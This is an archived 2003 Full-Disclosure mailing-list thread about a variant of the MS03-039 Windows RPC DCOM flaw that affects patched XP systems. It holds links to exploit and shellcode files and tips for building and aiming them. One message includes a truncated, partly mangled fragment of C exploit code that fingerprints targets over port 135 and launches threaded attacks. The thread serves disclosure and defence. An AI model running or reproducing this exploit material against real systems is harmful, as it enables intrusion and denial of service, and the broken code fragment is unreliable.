[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Alex
Exploit code can be found here:
http://www.securitylab.ru/40754.html

This code work with  all  security  fixes. It's very dangerous.

- Original Message - 
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability


> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
> again actual.
> 2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
> with  all  security  fixes  installed still vulnerable to variant of the
> same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> exists,  but  code execution is probably possible. Technical details are
> sent to Microsoft, waiting for confirmation.
>
> Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
> Windows XP.
>
> -- 
> http://www.security.nnov.ru
>  /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> |  ZARAZA  U  3APA3A   }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Adrian_Stone

If I am reading this correctly in the sense is it being stated that with
all patches and hotfixes systems are still vulnerabile to some form of the
RPC exploit as it relates to ms039?

Thanks!

Stone


   

  3APA3A   

  <[EMAIL PROTECTED]To:   [EMAIL PROTECTED], [EMAIL 
PROTECTED],  
  NNOV.RU>  [EMAIL PROTECTED]  
 
   cc:   [EMAIL PROTECTED] 
 
  10/10/2003 10:48 Subject:  Bad news on RPC DCOM 
vulnerability
  AM   

  Please respond to

  3APA3A   

   

   





Dear [EMAIL PROTECTED],

There are few bad news on RPC DCOM vulnerability:

1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
again actual.
2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
with  all  security  fixes  installed still vulnerable to variant of the
same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
exists,  but  code execution is probably possible. Technical details are
sent to Microsoft, waiting for confirmation.

Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
Windows XP.

--
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   }
+-o66o--+ /
|/
You know my name - look up my number (The Beatles)







___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread petard
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
> For us that can not interpret the site, what more information can be
> provided.
> 
> Bobby
> 
FYI, the site is in Russian. Here are the steps for enlightening yourself:

1. Visit your favorite search engine.
2. Type the words "online translator russian" (without quotation marks) into
the query field.
3. Visit one of the many free or paid translating services that are listed there.
4. Select your preferred language (English, I'd wager), enter the URL, and let
the translator go to work.
5. Read the slightly stilted but informative result.

FWIW, entering that query into google and clicking "I'm feeling lucky" gives good
results.

Good luck.

HTH,

petard


--
If your message really might be confidential, download my PGP key here:
http://petard.freeshell.org/petard.asc
and encrypt it. Otherwise, save bandwidth and lose the disclaimer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Bobby Brown
So I can "assume" no other information is posted, other than this site, to collaborate 
the RPC issue is not resolved or should we all try to translate this site using the 
helpful hints, which they are?


BB


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of petard
Sent: Friday, October 10, 2003 4:40 PM
To: Brown, Bobby (US - Hermitage)
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability


On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
> For us that can not interpret the site, what more information can be
> provided.
> 
> Bobby
> 
FYI, the site is in Russian. Here are the steps for enlightening yourself:

1. Visit your favorite search engine.
2. Type the words "online translator russian" (without quotation marks) into
the query field.
3. Visit one of the many free or paid translating services that are listed there.
4. Select your preferred language (English, I'd wager), enter the URL, and let
the translator go to work.
5. Read the slightly stilted but informative result.

FWIW, entering that query into google and clicking "I'm feeling lucky" gives good
results.

Good luck.

HTH,

petard


--
If your message really might be confidential, download my PGP key here:
http://petard.freeshell.org/petard.asc
and encrypt it. Otherwise, save bandwidth and lose the disclaimer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Byron Copeland
If this is at all really a new version of the rpc exploit that presents
the attacker with the holy grail, then it is probably as bad as others
have suggested.  I haven't tested yet.  But one thing I'd do is go
through all of my windows systems and turned the RPC service off. 
Patching is one thing, but if you don't need the service, turn it off.

On Out!

On Fri, 2003-10-10 at 20:05, Bobby Brown wrote:
> So I can "assume" no other information is posted, other than this site, to 
> collaborate the RPC issue is not resolved or should we all try to translate this 
> site using the helpful hints, which they are?
> 
> 
> BB
> 
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of petard
> Sent: Friday, October 10, 2003 4:40 PM
> To: Brown, Bobby (US - Hermitage)
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
> 
> 
> On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
> > For us that can not interpret the site, what more information can be
> > provided.
> > 
> > Bobby
> > 
> FYI, the site is in Russian. Here are the steps for enlightening yourself:
> 
> 1. Visit your favorite search engine.
> 2. Type the words "online translator russian" (without quotation marks) into
> the query field.
> 3. Visit one of the many free or paid translating services that are listed there.
> 4. Select your preferred language (English, I'd wager), enter the URL, and let
> the translator go to work.
> 5. Read the slightly stilted but informative result.
> 
> FWIW, entering that query into google and clicking "I'm feeling lucky" gives good
> results.
> 
> Good luck.
> 
> HTH,
> 
> petard
> 
> 
> --
> If your message really might be confidential, download my PGP key here:
> http://petard.freeshell.org/petard.asc
> and encrypt it. Otherwise, save bandwidth and lose the disclaimer.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread V.O.
There is not much info there, the site basically goes on saying that somebody
("karlss0n") posted the exploit  http://www.securitylab.ru/_exploits/rpc2.c.txt
to their bbs, the exploit is not using fixed jump addresses, which makes it work
with several versions of Windows. 

Then somebody has tried it against a patched XP and it seems to be working. 
Currently this exploit can be used for a shell on an unpatched (ms03-039) XP
(they say you need to put a shellcode into file bshell2 and fix a couple of
offsets, the sample code is at http://www.securitylab.ru/_exploits/shell.asm.txt)

On a patched XP this sploit only produces a DoS.

the discussion is here -
http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=1&TPN=3 ,more
informative, they talk about using SEH.

P.S.  I am not associated with anybody from this site/posting in; I am simply
translating the site for those who cannot read Russian, because online
translators are shite :)


Quoting Bobby Brown <[EMAIL PROTECTED]>:

> So I can "assume" no other information is posted, other than this site, to
> collaborate the RPC issue is not resolved or should we all try to translate
> this site using the helpful hints, which they are?
> 
> 
> BB
> 
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of petard
> Sent: Friday, October 10, 2003 4:40 PM
> To: Brown, Bobby (US - Hermitage)
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
> 
> 
> On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage)
> wrote:
> > For us that can not interpret the site, what more information can be
> > provided.
> > 
> > Bobby
> > 
> FYI, the site is in Russian. Here are the steps for enlightening yourself:
> 
> 1. Visit your favorite search engine.
> 2. Type the words "online translator russian" (without quotation marks) into
> the query field.
> 3. Visit one of the many free or paid translating services that are listed
> there.
> 4. Select your preferred language (English, I'd wager), enter the URL, and
> let
> the translator go to work.
> 5. Read the slightly stilted but informative result.
> 
> FWIW, entering that query into google and clicking "I'm feeling lucky" gives
> good
> results.
> 
> Good luck.
> 
> HTH,
> 
> petard
> 
> 
> --
> If your message really might be confidential, download my PGP key here:
> http://petard.freeshell.org/petard.asc
> and encrypt it. Otherwise, save bandwidth and lose the disclaimer.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> 
> 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread petard
On Fri, Oct 10, 2003 at 07:05:46PM -0500, Bobby Brown wrote:
> So I can "assume" no other information is posted, other than this site, to 
> collaborate the RPC issue is not resolved or should we all try to translate this 
> site using the helpful hints, which they are?
> 
> 
k-otik posted some similar if not identical code, corroborating (to a point anyway) its
effectiveness. (It most likely worked for one of them if they posted it.)

I suggest taking the linked code, compiling it (use MSVC7) and testing it to confirm
for yourself. Please test on a machine that's not connected to the internet, though :-)

HTH,

petard


--
If your message really might be confidential, download my PGP key here:
http://petard.freeshell.org/petard.asc
and encrypt it. Otherwise, save bandwidth and lose the disclaimer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Brown, Bobby (US - Hermitage)
For us that can not interpret the site, what more information can be
provided.

Bobby

-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability


Exploit code can be found here:
http://www.securitylab.ru/40754.html

This code work with  all  security  fixes. It's very dangerous.

- Original Message - 
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability


> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
> again actual.
> 2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
> with  all  security  fixes  installed still vulnerable to variant of the
> same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> exists,  but  code execution is probably possible. Technical details are
> sent to Microsoft, waiting for confirmation.
>
> Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
> Windows XP.
>
> -- 
> http://www.security.nnov.ru
>  /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> |  ZARAZA  U  3APA3A   }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message (including any attachments) contains confidential information
intended for a specific individual and purpose, and is protected by law.  If
you are not the intended recipient, you should delete this message.  Any
disclosure, copying, or distribution of this message, or the taking of any
action based on it, is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Macroscape Solutions
For non-Russian speakers use http://babelfish.altavista.com/

--
Macroscape Solutions Inc.
information technology foresight
http://www.macroscape.com
--


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby
(US - Hermitage)
Sent: Friday, October 10, 2003 3:34 PM
To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

For us that can not interpret the site, what more information can be
provided.

Bobby

-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability


Exploit code can be found here:
http://www.securitylab.ru/40754.html

This code work with  all  security  fixes. It's very dangerous.

- Original Message - 
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability


> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
> again actual.
> 2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
> with  all  security  fixes  installed still vulnerable to variant of the
> same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> exists,  but  code execution is probably possible. Technical details are
> sent to Microsoft, waiting for confirmation.
>
> Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
> Windows XP.
>
> -- 
> http://www.security.nnov.ru
>  /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> |  ZARAZA  U  3APA3A   }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message (including any attachments) contains confidential information
intended for a specific individual and purpose, and is protected by law.  If
you are not the intended recipient, you should delete this message.  Any
disclosure, copying, or distribution of this message, or the taking of any
action based on it, is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 ** CRM114 Whitelisted by: securityfocus.com **
 
 ** ACCEPT: CRM114 Whitelisted by: securityfocus.com **
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Vladimir Parkhaev
Quoting Brown, Bobby (US - Hermitage) ([EMAIL PROTECTED]):
> For us that can not interpret the site, what more information can be
> provided.
> 

Funny enough, it is a russian translatiion of the original message you 
replying to:


> - Original Message - 
> From: "3APA3A" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Friday, October 10, 2003 6:48 PM
> Subject: Bad news on RPC DCOM vulnerability
> 
> 
> > Dear [EMAIL PROTECTED],
> >
> > There are few bad news on RPC DCOM vulnerability:
> >
> > 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
> > again actual.
> > 2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
> > with  all  security  fixes  installed still vulnerable to variant of the
> > same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> > exists,  but  code execution is probably possible. Technical details are
> > sent to Microsoft, waiting for confirmation.
> >
> > Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
> > Windows XP.
> >
> > -- 
> > http://www.security.nnov.ru
> >  /\_/\
> > { , . } |\
> > +--oQQo->{ ^ }<-+ \
> > |  ZARAZA  U  3APA3A   }
> > +-o66o--+ /
> > |/
> > You know my name - look up my number (The Beatles)
> >
> >
> >
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread V.O.
Yeah, but the original poster 3APA3A withheld the actual exploit, which is
available on that site.

- Original Message - 
From: "Vladimir Parkhaev" <[EMAIL PROTECTED]>
>
> Funny enough, it is a russian translatiion of the original message you
> replying to:
>
>
> > - Original Message - 
> > From: "3APA3A" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> > <[EMAIL PROTECTED]>
> > Cc: <[EMAIL PROTECTED]>
> > Sent: Friday, October 10, 2003 6:48 PM
> > Subject: Bad news on RPC DCOM vulnerability
> >
> >
> > > Dear [EMAIL PROTECTED],
> > >
> > > There are few bad news on RPC DCOM vulnerability:
> > >
> > > 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD
is
> > > again actual.
> > > 2.  It  was  reported  by exploit author (and confirmed), Windows XP
SP1
> > > with  all  security  fixes  installed still vulnerable to variant of
the
> > > same bug. Windows 2000/2003 was not tested. For a while only DoS
exploit
> > > exists,  but  code execution is probably possible. Technical details
are
> > > sent to Microsoft, waiting for confirmation.
> > >
> > > Dear  ISPs.  Please  instruct  you customers to use personal fireWALL
in
> > > Windows XP.
> > >
> > > -- 
> > > http://www.security.nnov.ru
> > >  /\_/\
> > > { , . } |\
> > > +--oQQo->{ ^ }<-+ \
> > > |  ZARAZA  U  3APA3A   }
> > > +-o66o--+ /
> > > |/
> > > You know my name - look up my number (The Beatles)
> > >
> > >
> > >
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Irwan Hadi
 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00}; 
*/ 
 fd_set fds2; 
 unsigned char buf[1024]; 

 int l; 
 struct timeval tv2; 
 FD_ZERO(&fds2); 
 FD_SET(sock, &fds2); 
 tv2.tv_sec = 6; 
 tv2.tv_usec = 0; 

 memset(buf,'\0',sizeof(buf)); 
 send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
 if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
 { 
  l=recv (sock, (char *)buf, sizeof (buf),0); 
//  for(i=0;i<52;i++) 
//  { 
//   if (i==28) i=i+4; 
//   if (buf[i+32]!=win2kvuln) 
//   { 
send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
{ 
 memset(buf,'\0',sizeof(buf)); 
 l=recv (sock, (char *)buf, sizeof (buf),0); 
 if (l==32) 
 { 
  closesocket(sock); 
  return(1);//winxp 
 } 
 else 
 { 
  #ifdef WIN32 
  closesocket(sock); 
  #else 
  close(sock); 
  #endif 
  return(0);//win2kby default. Nt4 not added.. 
 } 
} 
else return(-1); 
//   } 


  //} 
//  closesocket(sock); 
//  return(0);//win2k 
 } 
 closesocket(sock); 
 return(-1);  //Unknown 
} 
// 
int attack(char *ip1,bool atack) 
{ 
 unsigned char rawData[1036]; 
 memcpy(rawData,rawData1,1036); 
 unsigned char shellcode[5]; 
 char ip[200]; 
 strcpy(ip,ip1); 
WSADATA WSAData; 
SOCKET sock; 
int len,len1; 
SOCKADDR_IN addr_in; 
short port=135; 
unsigned char buf1[5]; 
unsigned char buf2[5]; 

 printf("%s\n",ip); 
//printf("RPC DCOM overflow Vulnerability discoveried by
//NSFOCUS\n"); 
//printf("Code by FlashSky,Flashsky xfocus org\n"); 
//printf("Welcome to our Site: http://www.xfocus.org\n";); 
//printf("Welcome to our Site: http://www.venustech.com.cn\n";); 
/*if(argc!=3) 
{ 
  printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
  for(int i=0;itm) while(thread_count>tm) Sleep(100); 
   CreateThread(NULL,0,&ThreadProc,"",0,NULL); 
   Sleep(10); 
   fflush(fp1); 
  } 
 } 
 Sleep(6); 
 fclose(fp1); 


} 
> 
> Bobby
> 
> -Original Message-
> From: Alex [mailto:[EMAIL PROTECTED]
> Sent: Friday, October 10, 2003 1:09 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
> 
> 
> Exploit code can be found here:
> http://www.securitylab.ru/40754.html
> 
> This code work with  all  security  fixes. It's very dangerous.
> 
> - Original Message - 
> From: "3APA3A" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
> <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Friday, October 10, 2003 6:48 PM
> Subject: Bad news on RPC DCOM vulnerability
> 
> 
> > Dear [EMAIL PROTECTED],
> >
> > There are few bad news on RPC DCOM vulnerability:
> >
> > 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
> > again actual.
> > 2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
> > with  all  security  fixes  installed still vulnerable to variant of the
> > same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> > exists,  but  code execution is probably possible. Technical details are
> > sent to Microsoft, waiting for confirmation.
> >
> > Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
> > Windows XP.
> >
> > -- 
> > http://www.security.nnov.ru
> >  /\_/\
> > { , . } |\
> > +--oQQo->{ ^ }<-+ \
> > |  ZARAZA  U  3APA3A   }
> > +-o66o--+ /
> > |/
> > You know my name - look up my number (The Beatles)
> >
> >
> >
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> This message (including any attachments) contains confidential information
> intended for a specific individual and purpose, and is protected by law.  If
> you are not the intended recipient, you should delete this message.  Any
> disclosure, copying, or distribution of this message, or the taking of any
> action based on it, is strictly prohibited.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Dimitri Limanovski

Not much info on the page but here goes the juicy part.
Exploit: http://www.securitylab.ru/_exploits/rpc2.c.txt
Shellcode: http://www.securitylab.ru/_exploits/shell.asm.txt
Based on user responses, this is, in fact, working exploit that will
work on already patched systems. It's only a matter of time for
compiled binary to surface.

Dimitri



|-+-->
| |   "Brown, Bobby (US -|
| |   Hermitage)"|
| |   <[EMAIL PROTECTED]>|
| |   Sent by:   |
| |   [EMAIL PROTECTED]|
| |   .netsys.com|
| |  |
| |  |
| |   10/10/2003 03:34 PM|
| |  |
|-+-->
  
>--|
  |
  |
  |   To:   "'Alex'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL 
PROTECTED],  |
  |[EMAIL PROTECTED]   
   |
  |   cc:   [EMAIL PROTECTED]  
           |
  |   Subject:  RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability   
  |
  
>--|



For us that can not interpret the site, what more information can be
provided.

Bobby

-Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability


Exploit code can be found here:
http://www.securitylab.ru/40754.html

This code work with  all  security  fixes. It's very dangerous.

- Original Message -
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability


> Dear [EMAIL PROTECTED],
>
> There are few bad news on RPC DCOM vulnerability:
>
> 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK
FLOYD is
> again actual.
> 2.  It  was  reported  by exploit author (and confirmed), Windows XP
SP1
> with  all  security  fixes  installed still vulnerable to variant of
the
> same bug. Windows 2000/2003 was not tested. For a while only DoS
exploit
> exists,  but  code execution is probably possible. Technical details
are
> sent to Microsoft, waiting for confirmation.
>
> Dear  ISPs.  Please  instruct  you customers to use personal
fireWALL in
> Windows XP.
>
> --
> http://www.security.nnov.ru
>  /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> |  ZARAZA  U  3APA3A   }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)
>
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This message (including any attachments) contains confidential
information
intended for a specific individual and purpose, and is protected by
law.  If
you are not the intended recipient, you should delete this message.
Any
disclosure, copying, or distribution of this message, or the taking of
any
action based on it, is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Matthew D. Lammers
 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


*Gasp!*  You've never seen Babel Fish translate a webpage?

  http://babelfish.altavista.com/

And select "Translate a Web Page"...   Presto!  It's rough,
but gets you close enough.

Regards,
- -Matt.

- -- 
  Matthew D. Lammers, CISSP
  Columbus, Ohio, US

 


- -Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby (US - 
Hermitage)
Sent: Friday, October 10, 2003 3:34 PM
To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability


For us that can not interpret the site, what more information can be
provided.

Bobby

- -Original Message-
From: Alex [mailto:[EMAIL PROTECTED]
Sent: Friday, October 10, 2003 1:09 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability


Exploit code can be found here:
http://www.securitylab.ru/40754.html



-BEGIN PGP SIGNATURE-
Version: PGP 8.0

iQA/AwUBP4cgtwcf69dS5KepEQL5xQCeJjvocPI8r/qPCYCP61MvbGuxxWgAoJie
I6zE7ut38aXb1SpOaIK8vY91
=dNPg
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html